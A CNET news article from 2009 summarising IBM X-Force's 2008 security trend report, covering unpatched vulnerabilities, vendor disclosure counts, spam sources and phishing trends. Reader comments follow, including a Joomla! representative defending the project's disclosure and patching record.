Get Smart about Business Spending
IBM report: Vulnerabilities still going unpatched
More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.
Vendors with the most vulnerabilities disclosed in 2008.
(Credit: IBM X-Force)Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.
Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.
Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent), and Turkey (7.8 percent), although the spam senders could be located in a different location, the report says.
China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.
Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.
Two main trends attackers used last year were SQL injection attacks, in which a small malicious script is inserted into a database that feeds information to the Web site, and malicious URLs hosting exploits.
The operating systems with the most vulnerability disclosures in 2008.
(Credit: IBM X-Force)Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.
Elinor Mills covers Internet security and privacy. She joined CNET News in 2005 after working as a foreign correspondent for Reuters in Portugal and writing for The Industry Standard, the IDG News Service, and the Associated Press. E-mail Elinor. 
Please clarify. Did you switch to a plain list of disclosed vulns at this point in the article, or did you mean to continue speaking of vulnerabilities disclosed *but not patched* ?
I assume so as Oracle, Mozilla, Drupal, Joomla! are on that list and they don't make operating systems.
If so, that is a meaningless unless it is divided by the amount of software measured. So Microsoft makes the top of the list because it makes a wide variety of software. I also assume some of the Linux vendors get a break here because many Linux vulnerabilities are non-vendor specific.
I would be more concerned about a vendor (Joomla!) that makes one product (a CMS) being only one percent behind a vendor like Microsoft that makes mobile, client & server operating systems, desktop applications, database servers, email servers, internet servers, browsers, a CMS (SharePoint), IDEs and other programming tools and runtimes, Mac software, Enterprise apps (Dynamics), security tools, entertainment software / games, etc.
It's not difficult to locate contact information. Google Security Project Name and links are at the top.
- Drupal - http://drupal.org/security
- Joomla! - http://developer.joomla.org/security.html
- Typo 3 - http://typo3.org/teams/security/
This is corporate bully-ism at it's finest. If IBM wants to increase software security, step one is contacting those people with these so-called known issues so that they can bring necessary improvements. Then, if your PR guys insist on credit, contact the media and blow your own horn.
For 25 years, I've always been a fan of Big Blue. Shame on you, IBM!
- by elinwaring February 4, 2009 2:54 AM PST
- The problem with this list, is that it punishes applications for disclosing vulnerabilities. The Joomla! project is committed to disclosing security issues along with providing patches as soon as we can when a vulnerability is brought to light. I am proud to say that Joomla! has 100% disclosure of vulnerabilities and 100% patched.
- Reply to this comment
-
(8 Comments)Many of the vulnerabilities patched this year never resulted in a single problem because they were discovered by community members who brought them to the attention of the security team. That is how community driven open source development works. That is how transparency and education about security makes applications more secure. Openness is also how we get our user community to understand the need to update when a security release is made. Being open with our user and developer community about issues that are discovered is a good thing, and I cannot understand why IBM would seek to discourage it.
For a great example of how open source projects such as Joomla! respond to security issues, take a look at this article.
http://developer.joomla.org/coordinator-blog/245-how-joomla-156-came-about.html
From the last lines
Total time from report of vulnerability to initial release: 2 hours 50 minutes
Total time from report of vulnerability to completion of release cycle completion: 3 hours 40 minutes
Total number of people directly involved: between 20 and 30
I think Joomla! has plenty to be proud of when it comes to how it handles vulnerabilites.